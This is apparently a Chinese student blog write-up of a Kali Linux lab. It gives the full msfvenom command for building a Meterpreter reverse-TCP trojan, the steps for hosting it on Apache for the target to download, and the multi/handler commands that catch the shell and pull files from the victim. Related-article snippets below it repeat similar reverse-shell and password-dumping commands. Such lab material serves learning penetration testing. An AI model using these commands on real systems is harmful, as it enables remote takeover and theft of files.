Kali2虚拟机中工具Metasploit的简单应用

最新推荐文章于 2024-05-06 16:23:04 发布
最新推荐文章于 2024-05-06 16:23:04 发布
阅读量4.3k 收藏 5
点赞数 3
文章标签: linux 安全 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_55857040/article/details/121906680
版权

实验环境

攻击机:Kali-Linux-2021.2-vmware-amd64

靶机:Win2003 旗舰版

实验过程

一、利用metasploit生成被控端

打开kali窗口,输入命令(注意空格符,复现过程惨痛代价)

sudo msfvenom -p windows/meterpreter/reverse_tcp lhost=攻击机的ip地址 lport=5000 -f exe  -o  /root/payload.exe

这样就是生成成功了

 远程控制程序payload.exe(被控端)生成在我攻击机上的root文件夹里(root目录下文件会隐藏,ctrl+h就能显现出来了)

ps:如果进入/root/这个文件目录提示文件权限不足时,可以使用chmod 777 /root 命令来解锁权限

将木马文件payload.exe 拷贝到/var/www/html, 开启apache服务

  • cp /root/payload.exe /var/www/html/

  • service apache2 start

 

 

打开靶机,用浏览器访问以下url地址下载木马并安装

攻击机ip/ payload.exe

二、 启动攻击

kali窗口输入命令打开msf工具,并依次输入以下命令,配置连接

命令:msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 攻击机ip
set lport 5000
exploit

靶机运行网站下载的payload.exe文件后,回到攻击机,我们发现,Metasploit打开了一个session(会话),这表示从现在开始我们可以通过被控端程序控制目标计算机了

 输入ls命令查看目标计算机当前目录下的文件

我们在靶机该目录下使用下面的命令,就可以从目标靶机的当前目录下载文件到攻击机上了

download 文件名

文件下载一般是放到攻击机存放.exe木马的目录下(ps:root目录下文件会隐藏,ctrl+h就能显现出来了)

小结

这种木马.exe能利用是因为靶机上没有安装相关安全检测软件(例如火绒安全),所以我们的物理机上还是安装一个,安装未知来源的app是先扫描一下,还有电脑要常杀毒,保护我们的安全,very good!

 

 

 

 

 

不不不知名小菜鸡
关注
  • 3
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
永恒之蓝漏洞复现(二)对目标靶机建立用户,并且开启靶机的远程桌面,使用该用户进行连接
wty923的博客
01-12 1888
对目标靶机建立用户,并且开启靶机的远程桌面,使用该用户进行连接
小白Kali渗透Windows XP专业版SP3
m0_70497070的博客
09-17 1795
小白学Kali?机会来了!
kali使用Metasploit进行渗透攻击
最新发布
lhf13036943631的博客
05-06 740
2、载入easyfilesharing_seh渗透模块,查看需要设置的参数并进行设置,启动模块。(2)查找与EasyFileSharing有关的渗透模块。(输入命令或操作过程、结果截图并进行必要说明)(输入命令或操作过程、结果截图并进行必要说明)(输入命令或操作过程、结果截图并进行必要说明)(输入命令或操作过程、结果截图并进行必要说明)(输入命令或操作过程、结果截图并进行必要说明)(输入命令或操作过程、结果截图并进行必要说明)(输入命令或操作过程、结果截图并进行必要说明)
Kali-linux控制Meterpreter
2301_77162959的博客
05-17 1097
MeterpreterMetasploit框架的一个杀手锏,通常作为利用漏洞后的攻击载荷所使用,攻击载荷在触发漏洞后能够返回给用户一个控制通道。当使用Armitage、MSFCLI或MSFCONSOLE获取到目标系统上的一个Meterpreter连接时,用户必须使用Meterpreter传递攻击载荷。MSFCONSOLE用于管理用户的会话,而Meterpreter则是攻击载荷和渗透攻击交互。本节将介绍Meterpreter的使用。
Kali 渗透测试:Meterpreter在Windows系统下的使用
Liu_Bruce的博客
05-11 3016
Kali 渗透测试:Meterpreter在Windows系统下的使用 实 验 环 境: VMware Workstation 16 PRO 操作机:Kali Linux 5.10.0 IP(192.168.68.125) 靶机:Win7 实 验 步 骤: 1. 生成被控端payload 在操作机执行如下命令: ┌──(root💀kali)-[~] └─# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.68.125 L
详尽的msf——meterpreter——渗透测试教程
热门推荐
qq_42882717的博客
03-21 2万+
详尽的msf——meterpreter——渗透测试教程,如何使用,如何前后期做渗透测试
Metasploit简单利用及入侵Windows7案例.docx
11-13
Metasploit 入门---漏洞利用实验,攻击机系统:kali linux虚拟机。本文选择MS17_010漏洞(永恒之蓝)和MS08-067漏洞利用来尝试入侵Windows7虚拟机系统,目标机系统:Windows7 x64虚拟机
Kali虚拟机 脚本测试.docx
10-16
标题的“Kali虚拟机 脚本测试.docx”指的是使用Kali Linux操作系统作为攻击平台,通过虚拟机(如VMware)对Windows系统(可能是Windows 2008)进行安全测试和漏洞扫描。描述提到的操作包括了网络扫描、漏洞...
十二、VMware Workstation环境安装以及Kali Linux虚拟机安装运行教程
01-11
2. **导入Kali虚拟机**:如果你有预配置的.vmx文件,可以通过“文件”菜单的“打开”选项导入。如果没有,可以新建一个虚拟机,然后在自定义设置指向Kali Linux的ISO镜像文件。 3. **配置虚拟机设置**:在虚拟机...
kali linux基础配置文档 文PDF版
03-24
5. **安全工具介绍**: Kali Linux预装了大量的安全和渗透测试工具,如Nmap(网络扫描)、Wireshark(网络封包分析)、Metasploit(漏洞利用框架)等,了解这些工具的基本用法是学习Kali Linux的重点。 6. **编程...
Kali操作系统上使用metasploit
weixin_55280439的博客
03-29 3198
meterpreter 是强大的后渗透模块,可以输入help 查看帮助信息,远程控制、命令执行、摄像头监控、密码获取、创建后门用户、破坏篡改系统.......这些看起来非常复杂又高级的操作都能用meterpreter 的一行或几个字母,简单的命令完成。[*Payload 是攻击载荷,就是攻击完成后想获取的东西,这里是想获取 meterpreter](注:显示攻击失败表示目标主机上没有此漏洞,此漏洞只适用于攻击自己的win7靶机,高版本的系统已经修复此漏洞,显示WIN 表示攻击成功,其他则是失败)
Kali渗透工具 - metasploit
A_Z_dd的博客
06-01 805
初步使用及了解Kali渗透工具 - metasploit
Kali使用Metapsloit渗透win10 生成 payload 反弹shell
weixin_45908624的博客
07-19 2371
windows payload 反弹shell
Metasploit(三) Meterpreter基础知识
u010680986的博客
08-29 1642
攻击前期步骤: 1. 启动msfconsole:命令行输入use exploit/windows/smb/ms08_067_netapi 2. 可以通过show options查看设置的条件,默认远程主机不会有内容,需要手动设置,通过set RHOST ip 进行设置目标主机地址,端口也可以设置,设置完成后,可以看到如下图,上面是目标主机的ip和端口信息,下面是本地信息 3. 设置完毕后,输入exploit就可以进入meterpreter shell 基本命令 输入help可以查看所有Met.
Kali远程控制Windows系统(Metasploit)
董哥的黑板报
06-24 2万+
一、在Kali Linux生成被控端(msfvenom命令) 第一步:下面我们用msfvenom命令使用反向远程控制程序“windows/meterpreter/reverse_tcp”。该软件执行时自动连接IP“192.168.43.77”,连接的端口为“5000”,生成的文件为payload.exe,在/root目录下 msfvenom -p windows/meterpreter/re...
Windows提权
赤赤三的博客
03-20 1065
Windows密码安全性测试: 本地管理员密码如何直接提取(能读取就直接读取,不能读取使用hash连接,实在不行就暴力破解): 直接通过mimikatz读取管理员密码: 使用Ophcrack破解系统Hash密码:https://ophcrack.sourceforge.io/tables.php 把这两个目录导入到kali自带工具里: 通过lazagne工具提取密码: 读取本地计算机所有密码 ...
渗透测试 ( 4 ) --- Meterpreter 命令详解
freeking101的博客
07-02 8465
MeterpreterMetasploit 框架的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell 的链接。Meterpreter shell 作为渗透模块有很多有用的功能,比如添加一个用户、隐藏一些东西、打开 shell、得到用户密码、上传下载远程主机的文件、运行 cmd.exe、捕捉屏幕、得到远程控制权、捕获按键信息、清除应用程序、显示远程主机的系统信息、显示远程机器的网络.
Kali Linux文指南:安装与应用详解
Kali Linux的一般应用部分,用户可以学习如何在电子取证模式下运行系统,安装和使用VMware Tools来优化虚拟机体验,以及如何运行著名的渗透测试框架Metasploit。此外,指南还介绍了如何自定义构建Kali ISO镜像和...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值